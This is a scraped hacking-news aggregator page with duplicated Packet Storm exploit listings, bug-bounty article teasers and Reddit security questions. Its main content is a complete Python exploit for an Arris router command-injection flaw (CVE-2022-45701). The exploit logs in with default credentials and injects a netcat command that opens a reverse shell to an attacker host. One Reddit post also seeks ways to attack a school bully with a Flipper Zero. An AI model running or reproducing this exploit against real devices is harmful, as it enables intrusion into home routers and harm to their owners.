Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BMC Control M SQL Injection / Denial Of Service
https://4.bp.blogspot.com/-9fc43SI8K3Q/WWlvhaBflZI/AAAAAAAAIQU/x3qxae6Q3eMl1Wf8m-XtOKQ3MaKSPPWfQCLcBGAs/s1600/h90.png
BMC Control M versions prior to 9.0.20.214 suffer from SQL injection, denial of service, and information leaks.
SHA-256 |
Download
Source:packetstormsecurity.com
BMC Control M SQL Injection / Denial Of Service
https://4.bp.blogspot.com/-9fc43SI8K3Q/WWlvhaBflZI/AAAAAAAAIQU/x3qxae6Q3eMl1Wf8m-XtOKQ3MaKSPPWfQCLcBGAs/s1600/h90.png
BMC Control M versions prior to 9.0.20.214 suffer from SQL injection, denial of service, and information leaks.
SHA-256 |
663462fd5f2483f44a7d0a8af7ced5264562e74d1760e52757133faa7d990a6dDownload
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Arris Router Firmware 9.1.103 Remote Code Execution
https://1.bp.blogspot.com/-ASAiGIAsbZo/WWlu3lcAbmI/AAAAAAAAII0/K9TarDW1B-wz0w-5-5rrjX8jWsow7QyegCLcBGAs/s1600/h100.png
Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.
SHA-256 |
Download
Source:packetstormsecurity.com
Arris Router Firmware 9.1.103 Remote Code Execution
https://1.bp.blogspot.com/-ASAiGIAsbZo/WWlu3lcAbmI/AAAAAAAAII0/K9TarDW1B-wz0w-5-5rrjX8jWsow7QyegCLcBGAs/s1600/h100.png
Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.
SHA-256 |
c888a848e11678625335a5e6746925d5f7f030e21217d0ca2ec6555b03d7a881Download
c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64
router_host = "http://192.168.0.1"
username = "admin"
password = "password"
lhost = "192.168.0.6"
lport = 80
def main():
print("Authorizing...")
cookie = get_cookie(gen_header(username, password))
if cookie == '':
print("Failed to authorize")
exit(-1)
print("Generating Payload...")
payload = gen_payload(lhost, lport)
print("Sending Payload...")
send_payload(payload, cookie)
print("Done, check shell..")
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def no_encode_params(params):
return "&".join("%s=%s" % (k,v) for k,v in params.items())
def get_cookie(header):
url = router_host+"/login"
params = no_encode_params({"arg":header, "_n":1})
resp=requests.get(url, params=params)
return resp.content.decode('UTF-8')
def set_oid(oid, cookie):
url = router_host+"/snmpSet"
params = no_encode_params({"oid":oid, "_n":1})
cookies = {"credential":cookie}
requests.get(url, params=params, cookies=cookies)
def gen_payload(h, p):
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
def send_payload(payload, cookie):
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
if __name__ == '__main__':
main()
Source:packetstormsecurity.com
CORS can only be completed by mentioning SOP or same-origin policy. So we should start with SOP before diving into CORS.Continue reading on Medium » (https://roadtooscp.medium.com/demystifying-cors-7072cfbc0c43?source=rss------bug_bounty-5)
Beanstalk Logic Error Bugfix Review
https://medium.com/immunefi/beanstalk-logic-error-bugfix-review-4fea17478716?source=rss------bug_bounty-5
https://medium.com/immunefi/beanstalk-logic-error-bugfix-review-4fea17478716?source=rss------bug_bounty-5
SummaryContinue reading on Immunefi » (https://medium.com/immunefi/beanstalk-logic-error-bugfix-review-4fea17478716?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Settle a discussion
If someone wants to run a video game that might have malicious code in it you can:
1.
Run it in a VM (host not connected)
2.
Run it on the host normally (host not connected)
Option 1 is nice cause it’s easy to destroy the VM instance and start over but option 2 offers the same. Is there a reason why it’s better to stick to the VM extra layer of security? Is there a possibility of malware sticking around post formatting and reinstall of the OS?
Thanks!
submitted by /u/66XO
[link] [comments]
Settle a discussion
If someone wants to run a video game that might have malicious code in it you can:
1.
Run it in a VM (host not connected)
2.
Run it on the host normally (host not connected)
Option 1 is nice cause it’s easy to destroy the VM instance and start over but option 2 offers the same. Is there a reason why it’s better to stick to the VM extra layer of security? Is there a possibility of malware sticking around post formatting and reinstall of the OS?
Thanks!
submitted by /u/66XO
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Remote hacking with flipper zero
I Have a bullie at my school that i want to teach a lesson Would it be possible to use the flipper zero wifi board to mess with him in some kind of way.
submitted by /u/Txc_duck
[link] [comments]
Remote hacking with flipper zero
I Have a bullie at my school that i want to teach a lesson Would it be possible to use the flipper zero wifi board to mess with him in some kind of way.
submitted by /u/Txc_duck
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
hashcat wierd gpu load
Hello everyone,
Some time ago i started to learn hashcat and noticed that hashcat doesn't load the gpu constantly. Gpu usage keeps jumping from 0 to 100%, is that normal for brute force attacks? i used the -w 4 and -O parameters. Second question, is 23000 H/s for rar3 compressed is good hashrate for rtx 3060?
submitted by /u/wolfiefromwallstreet
[link] [comments]
hashcat wierd gpu load
Hello everyone,
Some time ago i started to learn hashcat and noticed that hashcat doesn't load the gpu constantly. Gpu usage keeps jumping from 0 to 100%, is that normal for brute force attacks? i used the -w 4 and -O parameters. Second question, is 23000 H/s for rar3 compressed is good hashrate for rtx 3060?
submitted by /u/wolfiefromwallstreet
[link] [comments]